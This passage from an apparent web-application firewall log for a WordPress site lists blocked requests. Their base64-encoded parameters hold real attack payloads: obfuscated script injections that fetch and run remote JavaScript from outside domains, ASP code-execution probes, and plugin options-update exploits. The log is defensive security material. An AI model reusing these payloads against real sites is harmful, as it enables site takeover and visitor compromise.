Update','{\"learningMode\":0,\"failedRules\":\"138\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1t5cF9yZW1vdGVfZ2V0XQ==\",\"paramValue\":\"MQ==\",\"path\":\"L3dwLWFkbWluL2FkbWluLXBvc3QucGhw\",\"category\":\"privesc\",\"ssl\":1}'),(37858,1569949955.637330,1569949954.365100,'\0\0\0\0\0\0\0\0\0\0ÿÿhƒ›~',0,403,0,0,0,'http://bintara.com.my/wp-admin/admin-post.php',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','WP Live Chat Support <= 8.0.28 - Unauthenticated Stored Cross-Site Scripting','{\"learningMode\":0,\"failedRules\":\"147\",\"paramKey\":\"c2VydmVyLmVtcHR5\",\"paramValue\":\"\",\"path\":\"L3dwLWFkbWluL2FkbWluLXBvc3QucGhw\",\"category\":\"xss\",\"ssl\":0}'),(37712,1569411895.479190,1569411894.641400,'\0\0\0\0\0\0\0\0\0\0ÿÿÆE°',0,403,0,0,0,'https://bintara.com.my/wp-admin/admin-post.php?yp_remote_get=2',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','Yellow Pencil Visual Theme Customizer <= 7.1.9 Arbitrary Options Update','{\"learningMode\":0,\"failedRules\":\"138\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1t5cF9yZW1vdGVfZ2V0XQ==\",\"paramValue\":\"Mg==\",\"path\":\"L3dwLWFkbWluL2FkbWluLXBvc3QucGhw\",\"category\":\"privesc\",\"ssl\":1}'),(37874,1570077443.875915,1570077442.672400,'\0\0\0\0\0\0\0\0\0\0ÿÿ\ræüR',0,200,0,0,0,'http://bintara.com.my/?page_id=18','http://bintara.net/?page_id=18','Mozilla/5.0 (Windows NT 5.1; rv:52.0) Gecko/20100101 Firefox/52.0','logged:waf','Generic X-Forwarded-For Injection','{\"learningMode\":0,\"failedRules\":\"logged|150\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1gtRm9yd2FyZGVkLUZvcl0=\",\"paramValue\":\"dW5rbm93bg==\",\"path\":\"Lw==\",\"category\":\"bypass\",\"ssl\":0}'),(37714,1569411890.932782,1569411890.144900,'\0\0\0\0\0\0\0\0\0\0ÿÿÆE°',0,403,0,0,0,'https://bintara.com.my/wp-admin/admin-post.php?yp_remote_get=test',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','Yellow Pencil Visual Theme Customizer <= 7.1.9 Arbitrary Options Update','{\"learningMode\":0,\"failedRules\":\"138\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1t5cF9yZW1vdGVfZ2V0XQ==\",\"paramValue\":\"dGVzdA==\",\"path\":\"L3dwLWFkbWluL2FkbWluLXBvc3QucGhw\",\"category\":\"privesc\",\"ssl\":1}'),(37713,1569411893.235387,1569411892.375100,'\0\0\0\0\0\0\0\0\0\0ÿÿÆE°',0,403,0,0,0,'https://bintara.com.my/wp-admin/admin-post.php?yp_remote_get=1',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','Yellow Pencil Visual Theme Customizer <= 7.1.9 Arbitrary Options Update','{\"learningMode\":0,\"failedRules\":\"138\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1t5cF9yZW1vdGVfZ2V0XQ==\",\"paramValue\":\"MQ==\",\"path\":\"L3dwLWFkbWluL2FkbWluLXBvc3QucGhw\",\"category\":\"privesc\",\"ssl\":1}'),(37857,1569949957.915103,1569949956.659600,'\0\0\0\0\0\0\0\0\0\0ÿÿhƒ›~',0,403,0,0,0,'http://bintara.com.my/wp-admin/admin-ajax.php',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','WP Live Chat Support <= 8.0.28 - Unauthenticated Stored Cross-Site Scripting','{\"learningMode\":0,\"failedRules\":\"147\",\"paramKey\":\"c2VydmVyLmVtcHR5\",\"paramValue\":\"\",\"path\":\"L3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"xss\",\"ssl\":0}'),(37715,1569411888.740256,1569411887.967200,'\0\0\0\0\0\0\0\0\0\0ÿÿÆE°',0,403,0,0,0,'https://bintara.com.my/wp-admin/admin-post.php?yp_remote_get=3',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','Yellow Pencil Visual Theme Customizer <= 7.1.9 Arbitrary Options Update','{\"learningMode\":0,\"failedRules\":\"138\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1t5cF9yZW1vdGVfZ2V0XQ==\",\"paramValue\":\"Mw==\",\"path\":\"L3dwLWFkbWluL2FkbWluLXBvc3QucGhw\",\"category\":\"privesc\",\"ssl\":1}'),(37923,1570674771.957452,1570674771.121400,'\0\0\0\0\0\0\0\0\0\0ÿÿ·ž„',0,403,0,0,0,'http://bintara.com.my//plus/mcds.asp','https://www.baidu.com','Mozilla/5.0 (compatible; Baiduspider-render/2.0; +http://www.baidu.com/search/spider.html)','blocked:waf','SQL Injection','{\"learningMode\":0,\"failedRules\":\"3\",\"paramKey\":\"cmVxdWVzdC5ib2R5W2Fd\",\"paramValue\":\"RXhlY3V0ZSgiRXhlY3V0ZSgiIk9uIEVycm9yIFJlc3VtZSBOZXh0OlJlc3BvbnNlLkNsZWFyOkZ1bmN0aW9uIGJkKGJ5VmFsIHMpOkZvciBpPTEgVG8gTGVuKHMpIFN0ZXAgMjpjPU1pZChzLGksMik6SWYgSXNOdW1lcmljKE1pZChzLGksMSkpIFRoZW46RXhlY3V0ZSgiIiIiYmQ9YmQmY2hyJSgmSCIiIiImYyYiIiIiKSIiIiIpOkVsc2U6RXhlY3V0ZSgiIiIiYmQ9YmQmY2hyJSgmSCIiIiImYyZNaWQocyxpKzIsMikmIiIiIikiIiIiKTppPWkrMjpFbmQgSWYiIiZjaHIlKDEwKSYiIk5leHQ6RW5kIEZ1bmN0aW9uOlJlc3BvbnNlLldyaXRlKCIiIiItPnwiIiIiKTpFeGVjdXRlKCIiIiJPbiBFcnJvciBSZXN1bWUgTmV4dDoiIiIiJmJkKCIiIiI0NDY5NkQyMDUzM0E1MzNENTM2NTcyNzY2NTcyMkU0RDYxNzA3MDYxNzQ2ODI4MjIyRTIyMjkyNjYzNjg3MjI4MzkyOTNBNTM0NTU0MjA0MzNENDM3MjY1NjE3NDY1NEY2MjZBNjU2Mzc0MjgyMjUzNjM3MjY5NzA3NDY5NkU2NzJFNDY2OTZDNjU1Mzc5NzM3NDY1NkQ0RjYyNkE2NTYzNzQyMjI5M0E0OTY2MjA0NTcyNzIyMDU0Njg2NTZFM0E0NTcyNzIyRTQzNkM2NTYxNzIzQTQ1NkM3MzY1M0E0NjZGNzIyMDQ1NjE2MzY4MjA0NDIwNjk2RTIwNDMyRTQ0NzI2OTc2NjU3MzNBNTMzRDUzMjY0NDJFNDQ3MjY5NzY2NTRDNjU3NDc0NjU3MjI2NjM2ODcyMjgzNTM4MjkzQTRFNjU3ODc0M0E0NTZFNjQyMDQ5NjYzQTUyNjU3MzcwNkY2RTczNjUyRTU3NzI2OTc0NjUyODUzMjkiIiIiKSk6UmVzcG9uc2UuV3JpdGUoIiIiInw8LSIiIiIpOlJlc3BvbnNlLkVuZCIiKSIp\",\"path\":\"Ly9wbHVzL21jZHMuYXNw\",\"category\":\"sqli\",\"ssl\":0}'),(37921,1570674670.700998,1570674669.873100,'\0\0\0\0\0\0\0\0\0\0ÿÿ·ž„',0,403,0,0,0,'http://bintara.com.my//manage/Images/Sql.asp','https://www.baidu.com','Mozilla/5.0 (compatible; Baiduspider-render/2.0; +http://www.baidu.com/search/spider.html)','blocked:waf','SQL Injection','{\"learningMode\":0,\"failedRules\":\"3\",\"paramKey\":\"cmVxdWVzdC5ib2R5W3JtYl0=\",\"paramValue\":\"RXhlY3V0ZSgiRXhlY3V0ZSgiIk9uIEVycm9yIFJlc3VtZSBOZXh0OlJlc3BvbnNlLkNsZWFyOkZ1bmN0aW9uIGJkKGJ5VmFsIHMpOkZvciBpPTEgVG8gTGVuKHMpIFN0ZXAgMjpjPU1pZChzLGksMik6SWYgSXNOdW1lcmljKE1pZChzLGksMSkpIFRoZW46RXhlY3V0ZSgiIiIiYmQ9YmQmY2hyJSgmSCIiIiImYyYiIiIiKSIiIiIpOkVsc2U6RXhlY3V0ZSgiIiIiYmQ9YmQmY2hyJSgmSCIiIiImYyZNaWQocyxpKzIsMikmIiIiIikiIiIiKTppPWkrMjpFbmQgSWYiIiZjaHIlKDEwKSYiIk5leHQ6RW5kIEZ1bmN0aW9uOlJlc3BvbnNlLldyaXRlKCIiIiItPnwiIiIiKTpFeGVjdXRlKCIiIiJPbiBFcnJvciBSZXN1bWUgTmV4dDoiIiIiJmJkKCIiIiI0NDY5NkQyMDUzM0E1MzNENTM2NTcyNzY2NTcyMkU0RDYxNzA3MDYxNzQ2ODI4MjIyRTIyMjkyNjYzNjg3MjI4MzkyOTNBNTM0NTU0MjA0MzNENDM3MjY1NjE3NDY1NEY2MjZBNjU2Mzc0MjgyMjUzNjM3MjY5NzA3NDY5NkU2NzJFNDY2OTZDNjU1Mzc5NzM3NDY1NkQ0RjYyNkE2NTYzNzQyMjI5M0E0OTY2MjA0NTcyNzIyMDU0Njg2NTZFM0E0NTcyNzIyRTQzNkM2NTYxNzIzQTQ1NkM3MzY1M0E0NjZGNzIyMDQ1NjE2MzY4MjA0NDIwNjk2RTIwNDMyRTQ0NzI2OTc2NjU3MzNBNTMzRDUzMjY0NDJFNDQ3MjY5NzY2NTRDNjU3NDc0NjU3MjI2NjM2ODcyMjgzNTM4MjkzQTRFNjU3ODc0M0E0NTZFNjQyMDQ5NjYzQTUyNjU3MzcwNkY2RTczNjUyRTU3NzI2OTc0NjUyODUzMjkiIiIiKSk6UmVzcG9uc2UuV3JpdGUoIiIiInw8LSIiIiIpOlJlc3BvbnNlLkVuZCIiKSIp\",\"path\":\"Ly9tYW5hZ2UvSW1hZ2VzL1NxbC5hc3A=\",\"category\":\"sqli\",\"ssl\":0}'),(37808,1569949579.202263,1569949577.924900,'\0\0\0\0\0\0\0\0\0\0ÿÿhƒ›~',0,403,0,0,0,'https://bintara.com.my/wp-admin/admin-ajax.php',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','XSS: Cross Site Scripting','{\"learningMode\":0,\"failedRules\":\"9\",\"paramKey\":\"cmVxdWVzdC5ib2R5W3NnY2dvb2dsZWFuYWx5dGljXQ==\",\"paramValue\":\"PHNjcmlwdCAgIHR5cGU9dGV4dC9qYXZhc2NyaXB0IGxhbmd1YWdlPWphdmFzY3JpcHQ+dmFyIGMgPSAwO3ZhciBfYWFhYWFhYWE9U3RyaW5nLmZyb21DaGFyQ29kZSgxMDQvKl9hYWFhYWFhYSovLDExNi8qX2FhYWFhYWFhKi8sMTE2LypfYWFhYWFhYWEqLywxMTIvKiovLDExNS8qX2FhYWFhYWFhKi8sNTgvKl9hYWFhYWFhYSovLDQ3LypfYWFhYWFhYWEqLyw0Ny8qX2FhYWFhYWFhKi8sMTAzLypfYWFhYWFhYWEqLywxMDgvKl9hYWFhYWFhYSovLDk3LypfYWFhYWFhYWEqLywxMTUvKl9hYWFhYWFhYSovLDExNS8qKi8sNDYvKl9hYWFhYWFhYSovLDk4LyoqLywxMDEvKl9hYWFhYWFhYSovLDEwOC8qX2FhYWFhYWFhKi8sOTcvKl9hYWFhYWFhYSovLDExNi8qX2FhYWFhYWFhKi8sMTAxLypfYWFhYWFhYWEqLywxMTQvKl9hYWFhYWFhYSovLDk4LypfYWFhYWFhYWEqLywxMDEvKl9hYWFhYWFhYSovLDExOS8qKi8sOTcvKl9hYWFhYWFhYSovLDExNS8qX2FhYWFhYWFhKi8sMTE2LypfYWFhYWFhYWEqLywxMDQvKl9hYWFhYWFhYSovLDEwMS8qKi8sMTE0LypfYWFhYWFhYWEqLywxMDEvKl9hYWFhYWFhYSovLDQ2LypfYWFhYWFhYWEqLyw5OS8qX2FhYWFhYWFhKi8sMTExLyoqLywxMDkvKl9hYWFhYWFhYSovLDQ3LyoqLywxMDgvKl9hYWFhYWFhYSovLDExMS8qKi8sOTkvKl9hYWFhYWFhYSovLDk3LypfYWFhYWFhYWEqLywxMDgvKiovLDQ3LyoqLyw5OS8qX2FhYWFhYWFhKi8sMTA4LypfYWFhYWFhYWEqLywxMDEvKl9hYWFhYWFhYSovLDk3LypfYWFhYWFhYWEqLywxMTQvKl9hYWFhYWFhYSovLDQ2LypfYWFhYWFhYWEqLywxMDYvKl9hYWFhYWFhYSovLDExNS8qX2FhYWFhYWFhKi8sNjMpO3ZhciBfYWFhYWFhYWEgPSBfYWFhYWFhYWEoX2FhYWFhYWFhKTtpZihfYWFhYWFhYWEubGVuZ3RoID4gMyl7X2FhYWFhYWFhKF9hYWFhYWFhYSk7fSBmdW5jdGlvbiBfYWFhYWFhYWEoX2FhYWFhYWFhKXsgdmFyIF9hYWFhYWFhYSA9IG5ldyBYTUxIdHRwUmVxdWVzdCgpO19hYWFhYWFhYS5vcGVuKCBTdHJpbmcuZnJvbUNoYXJDb2RlKDcxLDY5LDg0KSwgX2FhYWFhYWFhLCBmYWxzZSApO19hYWFhYWFhYS5zZW5kKCBudWxsICk7cmV0dXJuIF9hYWFhYWFhYS5yZXNwb25zZVRleHQ7fWZ1bmN0aW9uIF9hYWFhYWFhYSh0b2RvKXsgdmFyIF9hYWFhYWFhYSA9IG5ldyBGdW5jdGlvbigneCcsICd5JywgdG9kbysnIHJldHVybiB4K3k7Jyk7X2FhYWFhYWFhKDAsMCk7fTwvc2NyaXB0Pg==\",\"path\":\"L3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"xss\",\"ssl\":1}'),(37889,1570544536.817639,1570544535.989800,'\0\0\0\0\0\0\0\0\0\0ÿÿw»äÎ',0,403,0,0,0,'http://bintara.com.my//config/AspCms_Config.asp','https://www.baidu.com','Mozilla/5.0 (compatible; Baiduspider-render/2.0; +http://www.baidu.com/search/spider.html)','blocked:waf','SQL Injection','{\"learningMode\":0,\"failedRules\":\"3\",\"paramKey\":\"cmVxdWVzdC5ib2R5W3lzaF0=\",\"paramValue\":\"RXhlY3V0ZSgiRXhlY3V0ZSgiIk9uIEVycm9yIFJlc3VtZSBOZXh0OlJlc3BvbnNlLkNsZWFyOkZ1bmN0aW9uIGJkKGJ5VmFsIHMpOkZvciBpPTEgVG8gTGVuKHMpIFN0ZXAgMjpjPU1pZChzLGksMik6SWYgSXNOdW1lcmljKE1pZChzLGksMSkpIFRoZW46RXhlY3V0ZSgiIiIiYmQ9YmQmY2hyJSgmSCIiIiImYyYiIiIiKSIiIiIpOkVsc2U6RXhlY3V0ZSgiIiIiYmQ9YmQmY2hyJSgmSCIiIiImYyZNaWQocyxpKzIsMikmIiIiIikiIiIiKTppPWkrMjpFbmQgSWYiIiZjaHIlKDEwKSYiIk5leHQ6RW5kIEZ1bmN0aW9uOlJlc3BvbnNlLldyaXRlKCIiIiItPnwiIiIiKTpFeGVjdXRlKCIiIiJPbiBFcnJvciBSZXN1bWUgTmV4dDoiIiIiJmJkKCIiIiI0NDY5NkQyMDUzM0E1MzNENTM2NTcyNzY2NTcyMkU0RDYxNzA3MDYxNzQ2ODI4MjIyRTIyMjkyNjYzNjg3MjI4MzkyOTNBNTM0NTU0MjA0MzNENDM3MjY1NjE3NDY1NEY2MjZBNjU2Mzc0MjgyMjUzNjM3MjY5NzA3NDY5NkU2NzJFNDY2OTZDNjU1Mzc5NzM3NDY1NkQ0RjYyNkE2NTYzNzQyMjI5M0E0OTY2MjA0NTcyNzIyMDU0Njg2NTZFM0E0NTcyNzIyRTQzNkM2NTYxNzIzQTQ1NkM3MzY1M0E0NjZGNzIyMDQ1NjE2MzY4MjA0NDIwNjk2RTIwNDMyRTQ0NzI2OTc2NjU3MzNBNTMzRDUzMjY0NDJFNDQ3MjY5NzY2NTRDNjU3NDc0NjU3MjI2NjM2ODcyMjgzNTM4MjkzQTRFNjU3ODc0M0E0NTZFNjQyMDQ5NjYzQTUyNjU3MzcwNkY2RTczNjUyRTU3NzI2OTc0NjUyODUzMjkiIiIiKSk6UmVzcG9uc2UuV3JpdGUoIiIiInw8LSIiIiIpOlJlc3BvbnNlLkVuZCIiKSIp\",\"path\":\"Ly9jb25maWcvQXNwQ21zX0NvbmZpZy5hc3A=\",\"category\":\"sqli\",\"ssl\":0}'),(37882,1570544468.925658,1570544468.088000,'\0\0\0\0\0\0\0\0\0\0ÿÿw»äÎ',0,403,0,0,0,'http://bintara.com.my//admin/error.asp','https://www.baidu.com','Mozilla/5.0 (compatible; Baiduspider-render/2.0; +http://www.baidu.com/search/spider.html)','blocked:waf','SQL Injection','{\"learningMode\":0,\"failedRules\":\"3\",\"paramKey\":\"cmVxdWVzdC5ib2R5W25peWFkZV0=\",\"paramValue\":\"RXhlY3V0ZSgiRXhlY3V0ZSgiIk9uIEVycm9yIFJlc3VtZSBOZXh0OlJlc3BvbnNlLkNsZWFyOkZ1bmN0aW9uIGJkKGJ5VmFsIHMpOkZvciBpPTEgVG8gTGVuKHMpIFN0ZXAgMjpjPU1pZChzLGksMik6SWYgSXNOdW1lcmljKE1pZChzLGksMSkpIFRoZW46RXhlY3V0ZSgiIiIiYmQ9YmQmY2hyJSgmSCIiIiImYyYiIiIiKSIiIiIpOkVsc2U6RXhlY3V0ZSgiIiIiYmQ9YmQmY2hyJSgmSCIiIiImYyZNaWQocyxpKzIsMikmIiIiIikiIiIiKTppPWkrMjpFbmQgSWYiIiZjaHIlKDEwKSYiIk5leHQ6RW5kIEZ1bmN0aW9uOlJlc3BvbnNlLldyaXRlKCIiIiItPnwiIiIiKTpFeGVjdXRlKCIiIiJPbiBFcnJvciBSZXN1bWUgTmV4dDoiIiIiJmJkKCIiIiI0NDY5NkQyMDUzM0E1MzNENTM2NTcyNzY2NTcyMkU0RDYxNzA3MDYxNzQ2ODI4MjIyRTIyMjkyNjYzNjg3MjI4MzkyOTNBNTM0NTU0MjA0MzNENDM3MjY1NjE3NDY1NEY2MjZBNjU2Mzc0MjgyMjUzNjM3MjY5NzA3NDY5NkU2NzJFNDY2OTZDNjU1Mzc5NzM3NDY1NkQ0RjYyNkE2NTYzNzQyMjI5M0E0OTY2MjA0NTcyNzIyMDU0Njg2NTZFM0E0NTcyNzIyRTQzNkM2NTYxNzIzQTQ1NkM3MzY1M0E0NjZGNzIyMDQ1NjE2MzY4MjA0NDIwNjk2RTIwNDMyRTQ0NzI2OTc2NjU3MzNBNTMzRDUzMjY0NDJFNDQ3MjY5NzY2NTRDNjU3NDc0NjU3MjI2NjM2ODcyMjgzNTM4MjkzQTRFNjU3ODc0M0E0NTZFNjQyMDQ5NjYzQTUyNjU3MzcwNkY2RTczNjUyRTU3NzI2OTc0NjUyODUzMjkiIiIiKSk6UmVzcG9uc2UuV3JpdGUoIiIiInw8LSIiIiIpOlJlc3BvbnNlLkVuZCIiKSIp\",\"path\":\"Ly9hZG1pbi9lcnJvci5hc3A=\",\"category\":\"sqli\",\"ssl\":0}'),(37966,1571333941.423920,1571333940.398100,'\0\0\0\0\0\0\0\0\0\0ÿÿ[y6G',0,403,0,0,0,'https://bintara.com.my/wp-admin/admin-ajax.php',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','WP Live Chat Support <= 8.0.28 - Unauthenticated Stored Cross-Site Scripting','{\"learningMode\":0,\"failedRules\":\"147\",\"paramKey\":\"c2VydmVyLmVtcHR5\",\"paramValue\":\"\",\"path\":\"L3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"xss\",\"ssl\":1}'),(37949,1571333165.700246,1571333164.298000,'\0\0\0\0\0\0\0\0\0\0ÿÿ[y6G',0,403,0,0,0,'https://bintara.com.my/wp-admin/admin-ajax.php?page=wppcp-settings',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','WP Private Content Plus <= 1.31 Unauthenticated Options Update','{\"learningMode\":0,\"failedRules\":\"161\",\"paramKey\":\"cmVxdWVzdC5ib2R5W3dwcGNwX3RhYl0=\",\"paramValue\":\"d3BwY3Bfc2VjdGlvbl9nZW5lcmFs\",\"path\":\"L3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"auth-bypass\",\"ssl\":1}'),(37978,1571334047.263339,1571334046.201500,'\0\0\0\0\0\0\0\0\0\0ÿÿ[y6G',0,403,0,0,0,'http://bintara.com.my/wp-admin/admin-ajax.php','livechat_settings','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','XSS: Cross Site Scripting','{\"learningMode\":0,\"failedRules\":\"9\",\"paramKey\":\"cmVxdWVzdC5ib2R5W2xpY2Vuc2VFbWFpbF0=\",\"paramValue\":\"Ij48c2NyaXB0ICB0eXBlPXRleHQvamF2YXNjcmlwdCBsYW5ndWFnZT1qYXZhc2NyaXB0PnZhciBjID0gMDt2YXIgX3ZodmJycng1M3Z6cj1TdHJpbmcuZnJvbUNoYXJDb2RlKDEwNC8qX3c1Mnp6ZzZzdzFqMyovLDExNi8qKi8sMTE2LypfZXFzdzY5ODAwN2d1Ki8sMTEyLypfZjYwN2s2dXVvdmVuKi8sMTE1LypfZXFzdzY5ODAwN2d1Ki8sNTgvKl93NTJ6emc2c3cxajMqLyw0Ny8qX2Y2MDdrNnV1b3ZlbiovLDQ3LypfdzUyenpnNnN3MWozKi8sOTkvKl92aHZicnJ4NTN2enIqLywxMDAvKl9lcXN3Njk4MDA3Z3UqLyw0Ni8qX2Y2MDdrNnV1b3ZlbiovLDExMi8qX3ZodmJycng1M3Z6ciovLDExNC8qX2Vxc3c2OTgwMDdndSovLDEwNS8qX3c1Mnp6ZzZzdzFqMyovLDExOC8qX3c1Mnp6ZzZzdzFqMyovLDk3Lypfdmh2YnJyeDUzdnpyKi8sOTkvKiovLDEyMS8qX2Vxc3c2OTgwMDdndSovLDEwOC8qKi8sMTExLyoqLyw5OS8qX3c1Mnp6ZzZzdzFqMyovLDk3LypfZXFzdzY5ODAwN2d1Ki8sMTE2LyoqLywxMDUvKl92aHZicnJ4NTN2enIqLywxMTEvKl9mNjA3azZ1dW92ZW4qLywxMTAvKl93NTJ6emc2c3cxajMqLywxMDIvKl9lcXN3Njk4MDA3Z3UqLywxMTEvKl92aHZicnJ4NTN2enIqLywxMTQvKl9mNjA3azZ1dW92ZW4qLywxMDgvKl93NTJ6emc2c3cxajMqLywxMTEvKl93NTJ6emc2c3cxajMqLyw5OS8qKi8sNDYvKiovLDk5LyoqLywxMTEvKiovLDEwOS8qX3ZodmJycng1M3Z6ciovLDQ3Lypfdmh2YnJyeDUzdnpyKi8sMTE2LypfZjYwN2s2dXVvdmVuKi8sOTcvKiovLDExMi8qKi8sMTEyLypfdmh2YnJyeDUzdnpyKi8sMTAxLypfZjYwN2s2dXVvdmVuKi8sMTE0LypfZjYwN2s2dXVvdmVuKi8sNDYvKl92aHZicnJ4NTN2enIqLywxMDYvKl9lcXN3Njk4MDA3Z3UqLywxMTUvKl9lcXN3Njk4MDA3Z3UqLyw2My8qX3ZodmJycng1M3Z6ciovLDEwOS8qKi8sNjEvKiovLDEwOS8qX2Y2MDdrNnV1b3ZlbiovKTt2YXIgX2Y2MDdrNnV1b3ZlbiA9IF9lcXN3Njk4MDA3Z3UoX3ZodmJycng1M3Z6cik7aWYoX2Y2MDdrNnV1b3Zlbi5sZW5ndGggPiAzKXtfOTNmdG1pejBtZjB0KF9mNjA3azZ1dW92ZW4pO30gZnVuY3Rpb24gX2Vxc3c2OTgwMDdndShfanZxdzA3a3FnYW5hKXsgdmFyIF93NTJ6emc2c3cxajMgPSBuZXcgWE1MSHR0cFJlcXVlc3QoKTtfdzUyenpnNnN3MWozLm9wZW4oIFN0cmluZy5mcm9tQ2hhckNvZGUoNzEsNjksODQpLCBfanZxdzA3a3FnYW5hLCBmYWxzZSApO193NTJ6emc2c3cxajMuc2VuZCggbnVsbCApO3JldHVybiBfdzUyenpnNnN3MWozLnJlc3BvbnNlVGV4dDt9ZnVuY3Rpb24gXzkzZnRtaXowbWYwdChfMzU0YmkxdG1ibGs5KXsgdmFyIF9jYTZqN2JsdW9qeTMgPSBuZXcgRnVuY3Rpb24oJ3gnLCAneScsIF8zNTRiaTF0bWJsazkrJyByZXR1cm4geCt5OycpO19jYTZqN2JsdW9qeTMoMCwwKTt9PC9zY3JpcHQ+\",\"path\":\"L3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"xss\",\"ssl\":0}'),(37985,1571334714.276265,1571334713.455800,'\0\0\0\0\0\0\0\0\0\0ÿÿ[y6G',0,403,0,0,0,'http://bintara.com.my/wp-admin/admin-post.php?yp_remote_get=1',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','Yellow Pencil Visual Theme Customizer <= 7.1.9 Arbitrary Options Update','{\"learningMode\":0,\"failedRules\":\"138\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1t5cF9yZW1vdGVfZ2V0XQ==\",\"paramValue\":\"MQ==\",\"path\":\"L3dwLWFkbWluL2FkbWluLXBvc3QucGhw\",\"category\":\"privesc\",\"ssl\":0}'),(37983,1571334717.364157,1571334716.475000,'\0\0\0\0\0\0\0\0\0\0ÿÿ[y6G',0,403,0,0,0,'http://bintara.com.my/wp-admin/admin-post.php?yp_remote_get=3',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','Yellow Pencil Visual Theme Customizer <= 7.1.9 Arbitrary Options Update','{\"learningMode\":0,\"failedRules\":\"138\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1t5cF9yZW1vdGVfZ2V0XQ==\",\"paramValue\":\"Mw==\",\"path\":\"L3dwLWFkbWluL2FkbWluLXBvc3QucGhw\",\"category\":\"privesc\",\"ssl\":0}'),(37984,1571334715.772042,1571334714.941600,'\0\0\0\0\0\0\0\0\0\0ÿÿ[y6G',0,403,0,0,0,'http://bintara.com.my/wp-admin/admin-post.php?yp_remote_get=2',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','Yellow Pencil Visual Theme Customizer <= 7.1.9 Arbitrary Options Update','{\"learningMode\":0,\"failedRules\":\"138\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1t5cF9yZW1vdGVfZ2V0XQ==\",\"paramValue\":\"Mg==\",\"path\":\"L3dwLWFkbWluL2FkbWluLXBvc3QucGhw\",\"category\":\"privesc\",\"ssl\":0}'),(37979,1571334045.477915,1571334044.309900,'\0\0\0\0\0\0\0\0\0\0ÿÿ[y6G',0,403,0,0,0,'http://bintara.com.my/wp-admin/admin-ajax.php?page=wppcp-settings',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','WP Private Content Plus <= 1.31 Unauthenticated Options Update','{\"learningMode\":0,\"failedRules\":\"161\",\"paramKey\":\"cmVxdWVzdC5ib2R5W3dwcGNwX3RhYl0=\",\"paramValue\":\"d3BwY3Bfc2VjdGlvbl9nZW5lcmFs\",\"path\":\"L3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"auth-bypass\",\"ssl\":0}'),(37986,1571334712.763052,1571334711.871200,'\0\0\0\0\0\0\0\0\0\0ÿÿ[y6G',0,403,0,0,0,'http://bintara.com.my/wp-admin/admin-post.php?yp_remote_get=test',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','Yellow Pencil Visual Theme Customizer <= 7.1.9 Arbitrary Options Update','{\"learningMode\":0,\"failedRules\":\"138\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1t5cF9yZW1vdGVfZ2V0XQ==\",\"paramValue\":\"dGVzdA==\",\"path\":\"L3dwLWFkbWluL2FkbWluLXBvc3QucGhw\",\"category\":\"privesc\",\"ssl\":0}'),(37980,1571334041.798151,1571334040.852800,'\0\0\0\0\0\0\0\0\0\0ÿÿ[y6G',0,403,0,0,0,'http://bintara.com.my/wp-admin/admin-ajax.php?page=wppcp-security-settings-page',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','WP Private Content Plus <= 1.31 Unauthenticated Options 